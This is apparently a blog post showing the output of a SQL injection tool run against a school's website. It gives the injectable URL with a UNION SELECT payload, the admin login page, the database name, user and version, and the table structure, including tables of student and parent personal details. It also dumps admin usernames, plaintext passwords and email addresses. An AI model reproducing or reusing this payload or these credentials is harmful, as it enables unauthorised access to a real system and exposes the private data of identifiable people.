Tool: schemafuzz.py v5.0
Admin loc --> http://www.icmcipanas.sch.id/cpanel/admin.php
Admin usr:pwd --> see above pic.
Dump:
[+] URL:http://www.icmcipanas.sch.id/news.php?p=detn&kode=46+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 21:22:53
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t41437_icm
User: t41437_icm@localhost
Version: 5.0.32-Debian_7etch6-log
[Database]: t41437_icm
[Table: Columns]
[0]admin: id,nama,password,level,email,date,namatgs,passtgs,emailtgs
[1]alumni: id,nama,nm,email,alamat,tlp,angkatan,status,kerja,img
[2]banner: id,gambar,size
[3]berita: idnews,judul,isi,penulis,gambar,date
[4]cln_siswa: id,id_jenjang,nm_clnsiswa,jns_kelamin,tgl_lahir,bln_lahir,thn_lahir,tmp_lahir,tlp,status,almt,kota,kodepos,asl_sekolah,nm_sekolah,almt_sekolah,jenjang,nm_ayah,agm_ayah,pend_ayah,pekj_ayah,nm_ibu,agm_ibu,pend_ibu,pekj_ibu,almt_ortu,tanggal
[5]gambar: id,kategori,kode,img,status
[6]imtak: id,judul,isi,penulis,date
[7]jenjang: id,jenjang
[8]komentar: id,nama,email,tanggal,pesan
[9]kuis: idkuis,pelajaran,isi,penulis,kelas,date
[-] [21:24:25]
[-] Total URL Requests 80
[-] Done
[+] URL:http://www.icmcipanas.sch.id/news.php?p=detn&kode=46+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 21:24:40
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t41437_icm
User: t41437_icm@localhost
Version: 5.0.32-Debian_7etch6-log
[Database]: t41437_icm
[Table: Columns]
[0]admin: id,nama,password,level,email,date,namatgs,passtgs,emailtgs
[1]alumni: id,nama,nm,email,alamat,tlp,angkatan,status,kerja,img
[2]banner: id,gambar,size
[3]berita: idnews,judul,isi,penulis,gambar,date
[4]cln_siswa: id,id_jenjang,nm_clnsiswa,jns_kelamin,tgl_lahir,bln_lahir,thn_lahir,tmp_lahir,tlp,status,almt,kota,kodepos,asl_sekolah,nm_sekolah,almt_sekolah,jenjang,nm_ayah,agm_ayah,pend_ayah,pekj_ayah,nm_ibu,agm_ibu,pend_ibu,pekj_ibu,almt_ortu,tanggal
[5]gambar: id,kategori,kode,img,status
[6]imtak: id,judul,isi,penulis,date
[7]jenjang: id,jenjang
[8]komentar: id,nama,email,tanggal,pesan
[9]kuis: idkuis,pelajaran,isi,penulis,kelas,date
[-] [21:25:09]
[-] Total URL Requests 80
[-] Done
[+] URL:http://www.icmcipanas.sch.id/news.php?p=detn&kode=46+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 21:26:04
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t41437_icm
User: t41437_icm@localhost
Version: 5.0.32-Debian_7etch6-log
[+] Dumping data from database "t41437_icm" Table "admin"
[+] Column(s) ['nama', 'password', 'email', 'namatgs', 'passtgs', 'emailtgs']
[+] Number of Rows: 5
[0] mila:ciputat:milah_u@yahoo.com:NoDataInColumn:0:0:
[1] heri:adindaku:heri@yahoo.com:NoDataInColumn:0:0:
[2] aku:aku:aku@yahoo.com:NoDataInColumn:0:0:
[3] euse:eighty8:euse@icmcipanas.sch.id:NoDataInColumn:0:0:
[4] kerberos:webmaster:kerberos@icmcipanas.sch.id:NoDataInColumn:0:0:0:
[-] [21:26:07]
[-] Total URL Requests 7
[-] Done
0 comments:
Post a Comment